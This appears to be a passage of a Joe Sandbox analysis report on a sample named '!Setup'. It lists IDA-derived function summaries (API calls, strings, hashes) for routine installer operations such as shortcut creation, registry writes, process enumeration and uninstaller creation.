Associated: 00000000.00000002.2045905557.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2046073188.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_!Setup.jbxd

Similarity

API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
String ID: F$ F$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 3581403547-1792361021
Opcode ID: 30c92c856c733ebf4e786737c731cc744bbcb1db4e86cdf6d89c5ce8018e8b94
Instruction ID: 94ababd57b57874809535cfc920d07d17cc92350817822ff6505e5e4c02fddf3
Opcode Fuzzy Hash: 30c92c856c733ebf4e786737c731cc744bbcb1db4e86cdf6d89c5ce8018e8b94
Instruction Fuzzy Hash: 9E71D6B1A00112ABDF20AF69CC44A7A3775AB55314F12C13BE907B66E0E73C89A1DB59

Function 004024FB Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 133comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(0040AC30,?,00000001,0040AC10,?), ref: 0040257E

Strings

CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560

Memory Dump Source

Source File: 00000000.00000002.2045829743.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2045816408.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045844559.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2046073188.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_!Setup.jbxd

Similarity

API ID: CreateInstance
String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
API String ID: 542301482-1377821865
Opcode ID: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
Instruction ID: 17e7a05f0d3b91d3be5025a92c0a08315d4604efbe7233a371b14ee5b096337f
Opcode Fuzzy Hash: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
Instruction Fuzzy Hash: 9E416E74A00205BFCB04EFA0CC99EAE7B79EF48314B20456AF915EB3D1C679A941CB54

Function 004079A2 Relevance: .3, Instructions: 347COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2045829743.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2045816408.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045844559.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2046073188.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_!Setup.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 944ebb341680e93427b3a15fa59e4bc843c1d174164c9a0c79530ba1c2ca476e
Instruction ID: f621f802e1b16f1afd83cb625a9a5dfb13386b99c5f5a138cca70abed5397206
Opcode Fuzzy Hash: 944ebb341680e93427b3a15fa59e4bc843c1d174164c9a0c79530ba1c2ca476e
Instruction Fuzzy Hash: CEE17A71D04218DFCF14CF94D980AAEBBB1AF45301F1981ABEC55AF286D738AA41CF95

Function 0040737E Relevance: .3, Instructions: 303COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2045829743.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2045816408.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045844559.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2046073188.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_!Setup.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b88eb350fd00fb33316d24ceb9d72a370f105b0c57197cf1d2e0f134c7777fe
Instruction ID: 563abc6a1943806f9f153a5c0538de096a4a033458f435c3a5efc50f2cd88ab2
Opcode Fuzzy Hash: 1b88eb350fd00fb33316d24ceb9d72a370f105b0c57197cf1d2e0f134c7777fe
Instruction Fuzzy Hash: 67C16831A042598FCF18CF68C9805ED7BA2FF89314F25862AED56A7384E335BC45CB85

Function 004063D8 Relevance: 70.3, APIs: 29, Strings: 11, Instructions: 256libraryloadermemoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063EB
lstrlenW.KERNEL32(?), ref: 004063F8
GetVersionExW.KERNEL32(?), ref: 00406456

Part of subcall function 00406057: CharUpperW.USER32(?,0040642D,?), ref: 0040605D

LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406495
GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 004064B4
GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004064BE
GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004064C9
FreeLibrary.KERNEL32(00000000), ref: 00406500
GlobalFree.KERNEL32(?), ref: 00406509

Strings

Module32NextW, xrefs: 0040660A
Process32FirstW, xrefs: 004065E9
Module32FirstW, xrefs: 004065FF
PSAPI.DLL, xrefs: 00406490
EnumProcessModules, xrefs: 004064B6
CreateToolhelp32Snapshot, xrefs: 004065E1
GetModuleBaseNameW, xrefs: 004064C0
Unknown, xrefs: 00406528
EnumProcesses, xrefs: 004064AE
Kernel32.DLL, xrefs: 004065C7
Process32NextW, xrefs: 004065F4

Memory Dump Source

Source File: 00000000.00000002.2045829743.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2045816408.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045844559.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2046073188.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_!Setup.jbxd

Similarity

API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
API String ID: 20674999-2124804629
Opcode ID: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
Instruction ID: cf04814c2eceeca0522e3a2239a4cfb7588c45c97b625e8eb28f179f7b3afb0e
Opcode Fuzzy Hash: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
Instruction Fuzzy Hash: D3919371900219EBDF119FA4CD88AAEBBB8EF04705F11807AE906F7191DB788E51CF59

Function 004040E4 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 210windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404199
GetDlgItem.USER32(?,000003E8), ref: 004041AD
SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004041CA
GetSysColor.USER32(?), ref: 004041DB
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041E9
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041F7
lstrlenW.KERNEL32(?), ref: 00404202
SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040420F
SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040421E

Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404150,?), ref: 0040400D
Part of subcall function 00403FF6: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404150,?), ref: 0040401C
Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404150,?), ref: 00404030

GetDlgItem.USER32(?,0000040A), ref: 00404276
SendMessageW.USER32(00000000), ref: 0040427D
GetDlgItem.USER32(?,000003E8), ref: 004042AA
SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042ED
LoadCursorW.USER32(00000000,00007F02), ref: 004042FB
SetCursor.USER32(00000000), ref: 004042FE
ShellExecuteW.SHELL32(0000070B,open,0046E220,00000000,00000000,00000001), ref: 00404313
LoadCursorW.USER32(00000000,00007F00), ref: 0040431F
SetCursor.USER32(00000000), ref: 00404322
SendMessageW.USER32(00000111,00000001,00000000), ref: 00404351
SendMessageW.USER32(00000010,00000000,00000000), ref: 00404363

Strings

N, xrefs: 00404298
F, xrefs: 004042D3
open, xrefs: 0040430B

Memory Dump Source

Source File: 00000000.00000002.2045829743.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2045816408.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045844559.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2046073188.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_!Setup.jbxd

Similarity

API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
String ID: F$N$open
API String ID: 3928313111-1104729357
Opcode ID: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
Instruction ID: b74f7aac3d4bcd21dc7a54326fe4aeb8052e912a1eb6d084c2fa05dc76f75ebb
Opcode Fuzzy Hash: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
Instruction Fuzzy Hash: 5D71B5F1A00209BFDB109F65DD45EAA7B78FB44305F00853AFA05B62E1C778AD91CB99

Function 00406AC5 Relevance: 35.2, APIs: 15, Strings: 5, Instructions: 163filestringmemoryCOMMON

Download Yara Rule

APIs

lstrcpyW.KERNEL32(00465E20,NUL,?,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AD5
CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AF4
GetShortPathNameW.KERNEL32(000000F1,00465E20,00000400), ref: 00406AFD

Part of subcall function 00405DE2: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
Part of subcall function 00405DE2: lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24

GetShortPathNameW.KERNEL32(000000F1,0046B478,00000400), ref: 00406B1E
WideCharToMultiByte.KERNEL32(00000000,00000000,00465E20,000000FF,00466620,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B47
WideCharToMultiByte.KERNEL32(00000000,00000000,0046B478,000000FF,00466C70,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B5F
wsprintfA.USER32 ref: 00406B79
GetFileSize.KERNEL32(00000000,00000000,0046B478,C0000000,00000004,0046B478,?,?,00000000,000000F1,?), ref: 00406BB1
GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406BC0
ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BDC
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406C0C
SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,00467070,00000000,-0000000A,0040A87C,00000000,[Rename]), ref: 00406C63

Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2

WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C77
GlobalFree.KERNEL32(00000000), ref: 00406C7E
CloseHandle.KERNEL32(?), ref: 00406C88

Strings

NUL, xrefs: 00406ACA
[Rename], xrefs: 00406BF4, 00406C03
%s=%s, xrefs: 00406B6F
^F, xrefs: 00406ACF
plF, xrefs: 00406B54

Memory Dump Source

Source File: 00000000.00000002.2045829743.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2045816408.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045844559.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2046073188.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_!Setup.jbxd

Similarity

API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
String ID: ^F$%s=%s$NUL$[Rename]$plF
API String ID: 565278875-3368763019
Opcode ID: 8d6a48264c4b44e6e847a38bbc5540ed6369e357cae48dbe616f47649f698452
Instruction ID: 187392fb1a539ff374a899d42f74550c270b9899c721d3c7d9f4fe98b52eb23c
Opcode Fuzzy Hash: 8d6a48264c4b44e6e847a38bbc5540ed6369e357cae48dbe616f47649f698452
Instruction Fuzzy Hash: F2414B322082197FE7206B61DD4CE6F3E6CDF4A758B12013AF586F21D1D6399C10867E

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 127COMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010D8
FillRect.USER32(00000000,?,00000000), ref: 004010ED
DeleteObject.GDI32(?), ref: 004010F6
CreateFontIndirectW.GDI32(?), ref: 0040110E
SetBkMode.GDI32(00000000,00000001), ref: 0040112F
SetTextColor.GDI32(00000000,000000FF), ref: 00401139
SelectObject.GDI32(00000000,?), ref: 00401149
DrawTextW.USER32(00000000,00476AA0,000000FF,00000010,00000820), ref: 0040115F
SelectObject.GDI32(00000000,00000000), ref: 00401169
DeleteObject.GDI32(?), ref: 0040116E
EndPaint.USER32(?,?), ref: 00401177

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000000.00000002.2045829743.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2045816408.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045844559.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2046073188.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_!Setup.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
Instruction ID: 3a901b8e11bd10f40e8c3d59bf329074d7a31f92ad936af625f7db958ebfa50f
Opcode Fuzzy Hash: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
Instruction Fuzzy Hash: BF518772800209AFCF05CF95DD459AFBBB9FF45315F00802AF952AA1A1C738EA50DFA4

Function 00402880 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 131registrystringCOMMON

Download Yara Rule

APIs

RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
lstrlenW.KERNEL32(004140F8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
RegSetValueExW.ADVAPI32(?,?,?,?,004140F8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
RegCloseKey.ADVAPI32(?), ref: 004029E4

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

Strings

WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
WriteReg: error creating key "%s\%s", xrefs: 004029F5

Memory Dump Source

Source File: 00000000.00000002.2045829743.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2045816408.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045844559.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2046073188.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_!Setup.jbxd

Similarity

API ID: lstrlen$CloseCreateValuewvsprintf
String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
API String ID: 1641139501-220328614
Opcode ID: 066b4e300930aa0920c328732a1d1fc015c018ed119ca6dd3c3d5e24db852520
Instruction ID: c6ff7831871a22410ebf281ca69ba80d881ba5d3dc99c3f31bea2db7712f227d
Opcode Fuzzy Hash: 066b4e300930aa0920c328732a1d1fc015c018ed119ca6dd3c3d5e24db852520
Instruction Fuzzy Hash: EE418BB2D00208BFCF11AF91CD46DEEBB7AEF44344F20807AF605761A2D3794A509B69

Function 00406113 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 72filestringCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
GetFileAttributesW.KERNEL32(00476240,?,00000000,00000000,?,?,00406300,00000000), ref: 00406168
WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,00476240,40000000,00000004), ref: 004061A1
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,00476240,40000000,00000004), ref: 004061AD
lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),0040A678,?,00000000,00000000,?,?,00406300,00000000), ref: 004061C7
lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,00406300,00000000), ref: 004061CE
WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,00406300,00000000,?,?,00406300,00000000), ref: 004061E3

Strings

@bG, xrefs: 00406162
RMDir: RemoveDirectory invalid input(""), xrefs: 004061C1, 004061C6, 004061CD, 004061DC

Memory Dump Source

Source File: 00000000.00000002.2045829743.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2045816408.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045844559.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2046073188.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_!Setup.jbxd

Similarity

API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
String ID: @bG$RMDir: RemoveDirectory invalid input("")
API String ID: 3734993849-3206598305
Opcode ID: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
Instruction ID: 195d9f7db6fc7c0c2d4377fc833027156c916e626c5a885f84869a8699de3d55
Opcode Fuzzy Hash: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
Instruction Fuzzy Hash: 0121C271500240EBD710ABA8DD88D9B3B6CEB06334B118336F52ABA1E1D7389D85C7AC

Function 00402E55 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 103memoryfileCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
GlobalFree.KERNEL32(00000000), ref: 00402F17
CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
DeleteFileW.KERNEL32(?), ref: 00402F56

Strings

created uninstaller: %d, "%s", xrefs: 00402F3B

Memory Dump Source

Source File: 00000000.00000002.2045829743.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2045816408.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045844559.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2046073188.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_!Setup.jbxd

Similarity

API ID: Global$AllocFileFree$CloseDeleteHandleWrite
String ID: created uninstaller: %d, "%s"
API String ID: 3294113728-3145124454
Opcode ID: 43406d439bebe3a41a7ad8946693a81c25abcec0bebba575c0e34f0bdeff8a90
Instruction ID: bd1c3f70b2adfd396ae192ad3b35d3c6df9fc0ba6a3ee2c413e2f7d1cf6bca0f
Opcode Fuzzy Hash: 43406d439bebe3a41a7ad8946693a81c25abcec0bebba575c0e34f0bdeff8a90
Instruction Fuzzy Hash: CF319E72800115ABDB11AFA9CD89DAF7FB9EF08364F10023AF515B61E1C7394E419B98

Function 004023F0 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 83libraryCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C

Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00427D79,759223A0,00000000), ref: 00404FD6
Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00427D79,759223A0,00000000), ref: 00404FE6
Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00427D79,759223A0,00000000), ref: 00404FF9
Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
FreeLibrary.KERNEL32(?,?), ref: 004024C3

Strings

Error registering DLL: Could not initialize OLE, xrefs: 004024F1
`G, xrefs: 0040246E
Error registering DLL: Could not load %s, xrefs: 004024DB
Error registering DLL: %s not found in %s, xrefs: 0040249A

Memory Dump Source

Source File: 00000000.00000002.2045829743.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2045816408.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045844559.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
